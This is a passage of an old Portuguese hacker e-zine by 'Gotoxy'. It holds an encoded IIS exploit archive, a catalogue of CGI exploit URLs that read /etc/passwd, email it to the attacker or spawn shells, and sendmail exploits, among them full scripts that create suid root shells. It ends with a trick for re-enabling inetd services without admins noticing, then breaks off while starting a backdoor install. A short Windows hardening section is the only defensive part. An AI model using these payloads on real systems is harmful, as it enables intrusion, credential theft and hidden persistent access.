M`FP_/&VBC3'AQK'P([1XLKC`LV1B64D*R?%LW[*$<%*93.)R-TR0B,EZYV\8
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
7;%!+!08``````0`!`#<```!W%@``````
`
end

			       
########################## MSADC2.PL ##########################
                  
Nao estou incetivando ninguem uudecodear o uuencode acima para
sair por aih hackeando nt. Portanto, facam bom uso do mesmo. 
Ou melhor, soh uudecodeia e depois delete-se essa porcaria
do seu computador. =]

                                                                Gotoxy
					                                  gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------ |x:.









SETOR [13]
==[ Explorando Cgi's ]==
==[ Por Gotoxy       ]==
 
Aqui eu ia coloca outro texto, mas como o nosso AMIGO d4em0n nao quis
deixa eu colocar o txt, tive que mudar. Agora vou colocar um texto so
bre algumas falhas encontradas em cgi's.  Falhas como cgi  sao uma das 
coisas importantes que devemos saber, pois a maioria dos servidores ut
ilizam o cgi para facilitar o trabalho.

-palavras de coracaodeleao-
CGI significa Common Gateway Interface e se refere aos programas que
executam determinadas tarefas atraves de um servidor WEB, inclusive comandos
shell no Servidor Alvo. 
-palavras de coracaodeleao-


                              [] [] [] [] [] []
                     [] [] [] [] CGI - Falhas [] [] [] []   
                              [] [] [] [] [] [] 
Formato:

.[ cgi ].
informacao sobre o que se resulta o exploit
exploit

obs: nem todos tem a informacao no q resulta o exploit

*************************************************************************************

.[ wwwadmin.pl ].

Username: WebAdmin
Password: WebBoard

*************************************************************************************

.[ view-source ].
look the passwd 

http://www.host.com/cgi-bin/view-source?../../../../../../../etc/passwd

*************************************************************************************

.[ Webgais ].
recebe o passwd no seu email

telnet alvo 80 
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace 85 with length of the "exploit" line)
query=';mail+your_addy\@your_isp.com< /etc/passwd;echo'&output=subject&domain=paragraph

*************************************************************************************

.[ websendmail ].
recebe o passwd no seu email

telnet alvo 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: 85 (replace 85 with length of the "exploit" line)
receiver=;email+you_address\@somewhere.org< /etc/passwd;&sender=a&rtnaddr=a&subject=a
&content=a

*************************************************************************************

.[ Webdist ].

http://www.host.org/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-
ut%20-e%20/bin/sh

*************************************************************************************

.[ www-sql ].
http://your.server/cgi-bin/www-sql/protected/something.html

*************************************************************************************

.[ infowww2 ].
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami 

*************************************************************************************

.[ Handler ].
telnet alvo 80
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download
HTTP/1.0

*************************************************************************************

.[ Campus ].
olhe o passwd

telnet alvo 80
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
root:x:0:0:root:/root:/bin/bash
gotoxy:x:501:502:Gotoxy:/home/gotoxy:/bin/bash

*************************************************************************************

.[ Aglimpse ].
telnet alvo 80
GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5your_address\@your_computer.com\

*************************************************************************************

.[ Carbo ].
Para voce ver o win.ini do nt

http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog

*************************************************************************************

.[ Excite ].
receba o passwd no seu mail

lynx www.host.com/cgi-bin/excite;IFS="$";/bin/cat /etc/passwd|mail seu@email.com;

*************************************************************************************

.[ Finger ].
sem comentarios :)

lynx http://www.host.com/cgi-bin/finger?@localhost

*************************************************************************************

.[ Htdig ].
olhe o passwd
http://www.htdig.org/cgi-bin/htsearch?exclude=%60/etc/passwd%60

*************************************************************************************

.[ Phf ].
ver password
  http://host.com/cgi-bin/phf?Qalias=%0A/bin/cat%20/etc/passwd

listar diretorios
  http://host.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20/

inserir uma nova conta
  http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/adduser%20gotoxy%20gotoxy%20100%20

uid 0 para a conta inserida
  http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20gotoxy%0

*************************************************************************************

.[ Php ].
veja o passwd
  lynx http://www.host.com/cgi-bin/php.cgi?/etc/passwd

*************************************************************************************

.[ Somecgi ].
DoS ataque

  telnet alvo 80
  GET /cgi-bin/somecgi.cgi?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...

*************************************************************************************

.[ Coldfusion ].
telnet alvo 80
  GET /cfdocs/expelval/openfile.cfm HTTP/1.0
  GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0
  GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0

*************************************************************************************

.[ Convert-bas ].
veja o password
   
   lynx http://victim.com/scripts/convert.bas?../../etc/passwd

*************************************************************************************

.[ Faxsurvey ].
veja o password

   http://hostalvo.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

*************************************************************************************

.[ htmlscript ].
veja o passwd

   bash:/# lynx http://www.host.org/cgi-bin/htmlscript?../../../../etc/passwd

*************************************************************************************

.[ infosrch-cgi ].
Exploit:
   http://expensive.sgi.box/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id

*************************************************************************************

.[ Pfdisplay ].
Exploit:   
   lynx -source \ 'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/passwd'

*************************************************************************************

.[ Responder ].
echo "GET
   /cgi-bin/responder.cgi?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
   xxxxxxxxxxxxxxxxxxxxxxxxx" | nc alvo 80

*************************************************************************************

.[ webcom.guestbook ].
olhe o boot.ini do server   
   telnet alvo 80
   GET http://server/cgi-bin/wguest.exe?template=c:\boot.ini

*************************************************************************************

.[ whois_raw ].
look look o passwd

   http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd

*************************************************************************************

.[ htdig ].
Versao:      3.1.4, 3.2.0b1 and previous
Plataformas: Unix, Win32, MacOS, Mac OS X Server

Exploit: 
http://www.host.org/cgi-bin/htsearch?exclude=%60/etc/passwd%60  
                                                                   
*************************************************************************************

						   EOF
                                                                      
                                                                      Gotoxy
					                                        gotoxy@zines-br.com
.:x| -------------------------------------------------------------------------------- |x:.









SETOR [14]
==[ Explorando SendMail's ]==
==[ Por Gotoxy            ]==

 _________________________________________________________
\                  EXPLORANDO SENDMAILS                  /
 \_______________________Inicio_________________________/
   
                   ................
==================[ Sendmail: 5.55 ]==================
Siga o exemplo... 
======================================================
 
% telnet alvo.com 25
Trying 123.456.789.0..
Connected to alvo.com
Escape character is '^]'.
220 alvo.com Sendmail 5.55 ready at Sun, 07 July 92 00:00
mail from: "|/bin/mail meu@meuhost.com < /etc/passwd"
250 "|/bin/mail meu@meuhost.com < /etc/passwd"... Sender ok
rcpt to: gotoxy
550 gotoxy... User unknown
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Connection closed by foreign host.
% "." on a line by itself
.
250 Mail accepted
quit
Connection closed by foreign host.
%

                   ................
==================[ Sendmail: 5.65 ]==================
English sux
======================================================
 
..:-={{Collaborative Security Information Center}}=-:..
   X-TREME & TECHNOTRONIC Security Collaboration Project
http://www.technotronic.com  -==- http://www.x-treme.abyss.com


****************************************************************************
HACK: Sendmail 5.65: Backdoors in "sendmail" ('wiz' and 'debug' commands)
Version: 5.65, ? Others
System: Unix
Source: Bugtraq
****************************************************************************

The sendmail commands "wiz" and "debug" should be disabled.  
This may be verified by executing the following commands:
   
% telnet hostname 25
220 host Sendmail 5.65 ready at Wed, 29 Sep 93 20:28:46 PDT
wiz
You wascal wabbit!  Wandering wizards won't win!
(or 500 Command unrecognizED)
quit
   
% telnet hostname 25
220 host Sendmail 5.65 ready at Wed, 29 Sep 93 20:28:46 PDT
debug
500 Command unrecognized
quit
   
If the "wiz" command returns "Please pass, oh mighty wizard", 
your system is vulnerable to attack. Then type "SHELL" and it
will drop you into a root shell.The command should be disabled 
by adding a line to the sendmail.cf configuration file containing 
the string:
   
OW*

If the "debug" command responds with the string 
"200 Debug set",you should immediately obtain a 
newer version of sendmail  software  from  your 
vendor.

SOLUCAO:
Update seu sendmail para uma versao nova!
      

                       '''''''
                       '''''''
                       '''''''
                       '''''''

                  .................
==================[ Sendmail: 8.0 ]=================
   ioo% portuguese ----------------- ioo% portugues
===================================================== 

use esse shellscript para explorar a falha
no sendmail 8.0 em sistema SunOS. enjoy!=]

----------------------corte akih----------------------
#!/bin/sh
#
# Syntax: roption host
#
# host is any system running sendmail (except localhost).
#
# This exploits a flaw in SunOS sendmail(8), and attempts
# create a suid root shell
#
# Written 1995 by [8LGM]
# Please do not use this script without permission.
#
#
#
#******************************************************
#   HACK: Sendmail(8): Create suid root shells [8lgm]
#   System: SunOS
#   Source: [8lgm] at webserv@FOUR.net
#   Date: Aug 24,1995
#******************************************************
#

PROG="`basename $0`"
PATH=/usr/ucb:/usr/bin:/bin      export PATH
IFS=" "                          export IFS

# Check args
if [ $# -ne 1 ]; then
        echo "Syntax: $PROG host"
        exit 1
fi

# Check we're on SunOS
if [ "x`uname -s`" != "xSunOS" ]; then
        echo "Sorry, this only works on SunOS"
        exit 1
fi

PROG="`basename $0`"

EXECME=/tmp/HotterThanMojaveInMyHeart

# Create EXECME.c

cat > $EXECME.c << 'EOF'
main(argc,argv)
int argc;
char *argv[];
{
        chown("/tmp/InfamousAngel", 0, 0);
        chmod("/tmp/InfamousAngel", 04755);
}
EOF

cc -o $EXECME $EXECME.c

# Check we have EXECME

if [ ! -x $EXECME ]; then
        echo "$PROG: couldnt compile $EXECME.c - check it out"
        exit 1
fi

/bin/cp /bin/sh /tmp/InfamousAngel
# Run sendmail

/usr/lib/sendmail -oR$1 -f";$EXECME;" -t << 'EOF'
To: No1InParticular

Hows it goin
EOF

exec /tmp/InfamousAngel

----------------------corte akih----------------------


                        '''''''
                        '''''''
                        '''''''
                        '''''''

                   .................
==================[ Sendmail: 8.8.4 ]=================
   ioo% portuguese ----------------- ioo% portugues
====================================================== 

Eh necessario voce ter shell no sistema!!!
Jah logado no sistema, siga o exemplo abaixo:

$ ln /etc/passwd /var/tmp/dead.letter
$ telnet alvo 25
mail from: lammah@lammah.org
rcpt to: lammah@lammah.org
data
Gotoxy::0:0:Gotoxy:/root:/bin/bash
.
quit

Depois logue-se no sistema! Como? Com a conta Gotoxy, como vc
acompanhou no exemplo acima! you is superuser now!!

SOLUCAO:
Update seu sendmail para uma versao nova!

                       

                        '''''''
                        '''''''
                        '''''''
                        '''''''

                   .................
==================[ Sendmail: 8.6.7 ]=================
   ioo% portuguese ----------------- ioo% portugues
====================================================== 


]====[ Explorando Sendmail v8.6.7 ]====[ 

Falha no Sendmail 8.6.7 permite a leitura 
de um arquivo shadowed:

/usr/lib/sendmail -oE/etc/shadow bounce
From: seu@email.com.br

SOLUCAO:
Update seu sendmail para uma versao nova!

                        '''''''
                        '''''''
                        '''''''
                        '''''''


                   .................
==================[ Sendmail: 8.7 ]===================
   ioo% portuguese ----------------- ioo% portugues
====================================================== 

Creditos:
Leshka Zakharoff, 1996.
E-mail: leshka@leshka.chuvashia.su

                                  Hi !
                This is exploit for sendmail smtpd bug
    (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
        This shell script does a root shell in /tmp directory.
         If you have any problems with it, drop me a letter.
                              Have fun !

-------------------------passe a tesoura akih!!!-------------------------
#/bin/sh
echo   'main()                                                '>>leshka.c
echo   '{                                                     '>>leshka.c
echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
echo   '}                                                     '>>leshka.c
#
#
echo   'main()                                                '>>smtpd.c
echo   '{                                                     '>>smtpd.c
echo   '  setuid(0); setgid(0);                               '>>smtpd.c
echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
echo   '}                                                     '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
echo "Now type:   /tmp/sh"
-------------------------passe a tesoura akih!!!-------------------------


     _________________________________________________________
     \                  EXPLORANDO SENDMAILS                  /
      \_______________________FIM____________________________/

Cheguei a seguinte conclusao:
Todos as versoes do sendmail tem falhas!
Fuce fuce e fuce para encontrar mais falhas...
O futuro estah em suas maos fucadores!
=]
										    Gotoxy
     					                                  gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------ |x:.








SETOR [15]
==[ Seguranca no Windows ]==
==[ Por Gotoxy           ]==

"no windows existe poucas falhas encontradas...
 mas muitas escondidas! =]"

a frase acima quer dizer q no windows existem
muitas falhas no seu codigo. porem, poucas 
as falhas encotradas, simples pelo motivo
do windows ser closesource, ou seja, ele tem 
codigo totalmente fechado. =]

######################################
 -=[ Cuidados que voce deve tomar ]=-
######################################

-NAO executar nenhum arkivo desconhecido na sua 
makina, mesmo vindo de um amigo. Pois, pode ser
algum tipo de virus ou trojam.

- tome muito cuidado com as macros.. nao execute
qquer macro q vc nao tenha conhecimento da mesma.
pois os macros podem conter virus. entao, basta
vc renomear o NORMAL.DOT como 'somente leitura'.
Este arkivo provavelmente deve estar na pasta onde
se encontra o Word. Para facilitar o trabalho, clik
em  'Iniciar', 'Localizar', 'Arquivos ou Pastas' e 
procure por NORMAL.DOT. Depois de achado basta voce 
entrar no ms-dos, entrar no diretorio onde ele estah
e depois digitar: attrib +R NORMAL.DOT. Pronto! voce
estah protegido amigo..:)

-na hora de ler email's, cuidado com os virus como o
famoso 'i love you'. Emails no formato texto nao tem
problemas,os que tem problema de executar sao aqueles 
excutaveis.Quando o browser avisar q tal o aplicativo 
estah tentando executa algo,vc deve cancelar a acao!!
pois acredite,aqueles vbscripts son muy dangerous..:)

-utilizar um anti-virus, como por exemplo o Norton 
Anti-Virus. o norton eh bem eficiente, recomendo os
users win a utiliza-lo. para quem nao sabe, os anti
virus apenas elimina os virus de seu computador!bah

-utilize um firewall. para quem nao sabe o firewall
ajuda na seguranca do micro. eles eh apenas um prog
que trabalha entre a internet e  o  seu  computador,
impedindo assim, a acao de intrusos. um bom firewall
eh o XobobuS. 

-assine listas de discursao para voce obter mais 
experiencia. o problema quando voce assina uma
lista discursao eh q vc recebe muitos emails, 
sendo assim, sua box ficarah muita cheia. porem,
entrando no lado bom da historia, voce ganhara
muita experiencia e informacao dos ultimos bugs
encontrados, etc..

-entre no painel de controle e depois de 2 cliques
em 'rede'. em seguida, clique em 'compartilhamento
de impressao e de arquivos' e certifique-se q as
duas opcoes estejam desabilitadas. 

-entre no msdos e depois entre no diretorio 
system (c:\windows\system). Depois renomei
o arkivo vnbt.386 para qquer outro nome. 
Por exemplo: ren vnbt.386 gtx.com. Assim,
o arkivo vnbt.386 serah renomeado para o nome
gtx.com. Assim, vc ficarah protegido contra 
nukes, etc.

-ultima dica para a seguranca do seu windows:
UPTADE PARA O LINUX !! brincadeira.. continue
usando o win mesmo..


										     Gotoxy
     					                                   gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------ |x:.



SETOR [16]
==[ inetd.conf  ]==
==[ Por Gotoxy  ]==

inetd.conf

Estava eu akih pensando uma maneira de colocar
um servico no inetd.conf habilitado, mas com o
minimo possivel de chance de ser descoberto. E
acabei dscobrindo q tem jeito de se fazer isso
sem nenhuma difuculdade. Eh o seguinte, quando
o servico estah bloqueado, ele fica com um "#"
na frente, indicando q 'tal' linha estah sendo
super comentada e assim nao sera interpretada,
portanto, hah uma maneira de burlar esse "#" e
tb sem o que o admin perceba.Entrando na parte  
boa da historia: qndo vc ver servicos fechados
ou melhor, comentados,(com aqueles "#"), basta
voce colocar um "$" o servico serah desbloquea
do e assim o admin tem q ser bem  esperto para 
ver aquele "$".  Pronto gente, soh isso mesmo! 
Para voce nao  ter nenhum  ar de  curiosidade,
abaixo segue um exemplo de como vc deve proced
er.

Exemplo:
  Linha antes:
  #telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
  Linha depois:
  $telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd

Obs: 
- Nao faca isso com todos os servicos, pois o 
administrador pode desconfiar. 
- Instale a backdoor do Couried q assim em 
conjunto das duas tecnicas, vc terah acesso
ao sistema alvo sempre.
- enjoy! =]

Para vc que nao sabe como instalar a backdoor
do Couried, abaixo estah tudo explicadinho de
como se instala-la.

// Depois de logado no sistema...
bash# cp /bin/bash /usr/sbin
